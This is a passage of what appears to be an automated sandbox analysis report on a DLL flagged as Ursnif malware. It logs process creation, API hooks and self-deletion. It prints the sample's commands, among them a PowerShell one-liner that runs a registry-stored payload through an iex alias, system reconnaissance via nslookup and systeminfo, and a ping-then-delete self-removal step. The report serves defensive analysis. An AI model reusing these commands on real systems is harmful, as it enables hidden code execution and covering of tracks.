                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1E0C.bi1"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\1E0C.bi1"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\2E09.bin1"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A11.tmp" "c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP"
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5431.tmp" "c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1E0C.bi1"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\1E0C.bi1"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\2E09.bin1"
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1E0C.bi1"
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\System32\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eix4r5e5.krv.ps1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D68BD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1
                      Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{60D7F404-3F23-92D7-C994-E3E60D08C77A}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3104:120:WilError_01
                      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{5064A2E5-6FEB-0222-7984-1356BDF8F7EA}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1008:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_01
                      Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{CC5B86B9-BBE4-DE12-A5C0-1FF2A9F4C346}
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{8CCBC699-7B11-9ED8-6580-DFB269B48306}
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\nslookup.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                      Source: C:\Windows\explorer.exeFile opened: C:\Windows\SYSTEM32\msftedit.dll
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                      Source: 2oCOO5LbPu.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.pdb8 source: powershell.exe, 00000014.00000002.566709177.0000012312B1D000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.381155615.00000000068B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385084346.00000000068B0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: 2oCOO5LbPu.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.381155615.00000000068B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385084346.00000000068B0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.pdbXP source: powershell.exe, 00000014.00000002.568732109.0000012312B68000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D7EA0 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D828B push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06273495 push ecx; mov dword ptr [esp], 00000002h
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06293D9F push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_06281040 push es; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062938A0 push ecx; ret
                      Source: C:\Windows\System32\control.exeCode function: 24_2_00544492 push ss; ret
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_000001572393793F pushfd ; retf
                      Source: C:\Windows\System32\rundll32.exeCode function: 37_2_0000015723954492 push ss; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062786AD LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline
                      Source: 2oCOO5LbPu.dllStatic PE information: section name: .erloc
                      Source: ykprd3xj.dll.22.drStatic PE information: real checksum: 0x0 should be: 0x2507
                      Source: 2oCOO5LbPu.dllStatic PE information: real checksum: 0x79835 should be: 0x763dc
                      Source: dyznokx3.dll.25.drStatic PE information: real checksum: 0x0 should be: 0x14bd
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6680, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 7000, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5180, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4724, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4960, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.52f94a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.52f94a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.36d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.586a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5916b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.586a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.58e94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Hooks registry keys query functions (used to hide registry keys)
                      Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
                      Self deletion via cmd delete
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll
                      Modifies the export address table of user mode modules (user mode EAT hooks)
                      Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FF80250521C
                      Modifies the prolog of user mode functions (user mode inline hooks)
                      Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
                      Modifies the import address table of user mode modules (user mode IAT hooks)
                      Source: explorer.exeEAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FF802505200
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
